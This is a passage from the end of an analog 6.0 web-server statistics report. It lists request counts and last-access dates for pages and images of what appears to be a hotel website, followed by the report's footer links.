<tr><td class="R">58</td><td class="b"> 0.24%</td><td class="D">Apr/23/19  6:26 PM</td><td class="xl">/assets/images/facilities/pool/pool_slider1.jpg</td></tr>
<tr><td class="R">46</td><td class="b"> 0.04%</td><td class="D">Apr/ 5/18 11:11 AM</td><td class="xl">/accommodation/suites</td></tr>
<tr><td class="R">41</td><td class="b"> 0.03%</td><td class="D">Jul/ 8/18 10:15 AM</td><td class="xl">/downloads.php</td></tr>
<tr><td class="R">40</td><td class="b"> 0.03%</td><td class="D">Apr/23/19  9:44 AM</td><td class="xl">/accommodation/privacy-policy</td></tr>
<tr><td class="R">39</td><td class="b"> 0.03%</td><td class="D">Apr/23/19  9:44 AM</td><td class="xl">/accommodation/about-us</td></tr>
<tr><td class="R">36</td><td class="b"> 0.03%</td><td class="D">Apr/23/19  9:45 AM</td><td class="xl">/facilities/privacy-policy</td></tr>
<tr><td class="R">34</td><td class="b"> 0.03%</td><td class="D">Apr/23/19  9:45 AM</td><td class="xl">/facilities/about-us</td></tr>
<tr><td class="R">34</td><td class="b"> 0.03%</td><td class="D">Apr/23/19  9:44 AM</td><td class="xl">/accommodation/terms-and-conditions</td></tr>
<tr><td class="R">33</td><td class="b"> 0.03%</td><td class="D">Apr/23/19  9:45 AM</td><td class="xl">/facilities/terms-and-conditions</td></tr>
<tr><td class="R">31</td><td class="b"> 0.02%</td><td class="D">Apr/23/19  9:45 AM</td><td class="xl">/facilities/location</td></tr>
<tr><td class="R">28</td><td class="b"> 0.05%</td><td class="D">Apr/28/19  5:57 PM</td><td class="xl">/assets/images/acc/inner_deluxe/8.jpg</td></tr>
<tr><td class="R">25</td><td class="b"> 0.02%</td><td class="D">Apr/23/19  9:44 AM</td><td class="xl">/accommodation/location</td></tr>
<tr><td class="R">25</td><td class="b"> 0.05%</td><td class="D">Mar/31/19  6:03 PM</td><td class="xl">/assets/images/acc/inner_standard/6.jpg</td></tr>
<tr><td class="R">24</td><td class="b"> 0.03%</td><td class="D">Apr/ 2/19  1:25 PM</td><td class="xl">/assets/images/acc/inner_deluxe/2.jpg</td></tr>
<tr><td class="R">23</td><td class="b"> 0.06%</td><td class="D">Apr/28/19 11:44 AM</td><td class="xl">/assets/images/acc/inner_deluxe/11.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.04%</td><td class="D">Apr/28/19 11:05 AM</td><td class="xl">/assets/images/acc/inner_deluxe/1.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.05%</td><td class="D">Mar/29/19 11:06 PM</td><td class="xl">/assets/images/facilities/rest/rest-1.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.04%</td><td class="D">Mar/29/19  5:21 PM</td><td class="xl">/assets/images/acc/inner_deluxe/5.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.07%</td><td class="D">Apr/ 8/19 12:56 AM</td><td class="xl">/assets/images/facilities/rest/rest-2.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.03%</td><td class="D">Mar/30/19  2:37 AM</td><td class="xl">/assets/images/acc/inner_standard/4.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.05%</td><td class="D">Apr/ 2/19  1:47 AM</td><td class="xl">/assets/images/acc/inner_deluxe/6.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.07%</td><td class="D">Apr/28/19  5:03 PM</td><td class="xl">/assets/images/facilities/rest/rest-3.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.05%</td><td class="D">Mar/29/19 10:24 PM</td><td class="xl">/assets/images/acc/inner_standard/11.jpg</td></tr>
<tr><td class="R">20</td><td class="b"> 0.04%</td><td class="D">Mar/21/19 12:24 PM</td><td class="xl">/assets/images/acc/inner_standard/10.jpg</td></tr>
<tr><td class="R">20</td><td class="b"> 0.05%</td><td class="D">Mar/29/19  5:23 PM</td><td class="xl">/assets/images/acc/inner_deluxe/7.jpg</td></tr>
<tr><td class="R">393</td><td class="b"> 0.59%</td><td class="D">Apr/28/19  8:46 PM</td><td class="xl">[not listed: 50 files]</td></tr>
</tbody></table>
</div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>.
<br /><span class="runtimetitle">Running time:</span> Less than 1 second.
</p>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
</div>
</body>
</html>
